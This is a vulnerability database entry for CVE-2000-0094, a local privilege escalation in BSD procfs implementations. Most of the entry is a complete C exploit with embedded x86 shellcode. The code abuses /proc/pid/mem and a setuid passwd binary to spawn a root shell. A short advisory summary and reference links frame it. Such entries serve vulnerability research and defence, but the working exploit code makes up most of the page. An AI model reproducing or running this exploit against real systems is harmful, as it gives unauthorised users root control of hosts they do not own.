Multiple Vendor BSD /proc Filesystem Vulnerability

Vulnerability ID: 1105691    Type: Other
Published: 2000-01-21    Updated: 2005-05-02
CVE: CVE-2000-0094
CNNVD ID: CNNVD-200002-051
Platform: BSD    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-051
|Details
The procfs implementation in BSD systems contains a vulnerability. A local user can gain root privileges through the /proc/pid/mem interface by using a modified file descriptor for standard error.
|Exploit
source: http://www.securityfocus.com/bid/940/info

Certain BSD derivative operating systems use an implementation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host.

The proc file system was originally designed to allow easy access to information about processes (hence the name). Its typical benefit is quicker access to memory and hence more streamlined operations. As noted previously, certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes on systems which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry.

/* by Nergal */
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/wait.h>

char shellcode[] =
"\xeb\x0a\x62\x79\x20\x4e\x65\x72\x67\x61\x6c\x20"
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04\x00";

#define PASSWD "./passwd"

void
sg(int x)
{
    /* SIGUSR1 handler: exists only so pause() in the parent returns */
}

int
main(int argc, char **argv)
{
    unsigned int stack, shaddr;
    int pid, schild;
    int fd;
    char buff[40];
    int status;
    char *ptr;
    char name[4096];
    char sc[4096];
    char signature[] = "signature";

    signal(SIGUSR1, sg);
    if (symlink("usr/bin/passwd", PASSWD) && errno != EEXIST) {
        perror("creating symlink:");
        exit(1);
    }
    shaddr = (unsigned int) &shaddr;
    stack = shaddr - 2048;
    if (argc > 1)
        shaddr += atoi(argv[1]);
    if (argc > 2)
        stack += atoi(argv[2]);
    fprintf(stderr, "shellcode addr=0x%x stack=0x%x\n", shaddr, stack);
    fprintf(stderr, "Wait for \"Press return\" prompt:\n");
    memset(sc, 0x90, sizeof(sc));
    strncpy(sc + sizeof(sc) - strlen(shellcode) - 1, shellcode, strlen(shellcode));
    strncpy(sc, "EGG=", 4);
    memset(name, 'x', sizeof(name));
    for (ptr = name; ptr < name + sizeof(name); ptr += 4)
        *(unsigned int *) ptr = shaddr;
    name[sizeof(name) - 1] = 0;

    pid = fork();
    switch (pid) {
    case -1:
        perror("fork");
        exit(1);
    case 0:
        pid = getppid();
        sprintf(buff, "/proc/%d/mem", pid);
        fd = open(buff, O_RDWR);
        if (fd < 0) {
            perror("open procmem");
            wait(NULL);
            exit(1);
        }
        /* wait for child to execute suid program */
        kill(pid, SIGUSR1);
        do {
            lseek(fd, (unsigned int) signature, SEEK_SET);
        } while
            (read(fd, buff, sizeof(signature)) == sizeof(signature) &&
             !strncmp(buff, signature, sizeof(signature)));
        lseek(fd, stack, SEEK_SET);
        switch (schild = fork()) {
        case -1:
            perror("fork2");
            exit(1);
        case 0:
            dup2(fd, 2);
            sleep(2);
            execl(PASSWD, name, "blahblah", (char *) 0);
            printf("execl failed\n");
            exit(1);
        default:
            waitpid(schild, &status, 0);
        }
        fprintf(stderr, "\nPress return.\n");
        exit(1);
    default:
        /* give parent time to open /proc/pid/mem */
        pause();
        putenv(sc);
        execl(PASSWD, "passwd", NULL);
        perror("execl");
        exit(0);
    }
}
|References

Source: XF
Name: netbsd-procfs(3995)
Link: http://xforce.iss.net/xforce/xfdb/3995

Source: BID
Name: 940
Link: http://www.securityfocus.com/bid/940

Source: OSVDB
Name: 20760
Link: http://www.osvdb.org/20760

Source: NETBSD
Name: NetBSD-SA2000-001
Link: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2000-001.txt.asc
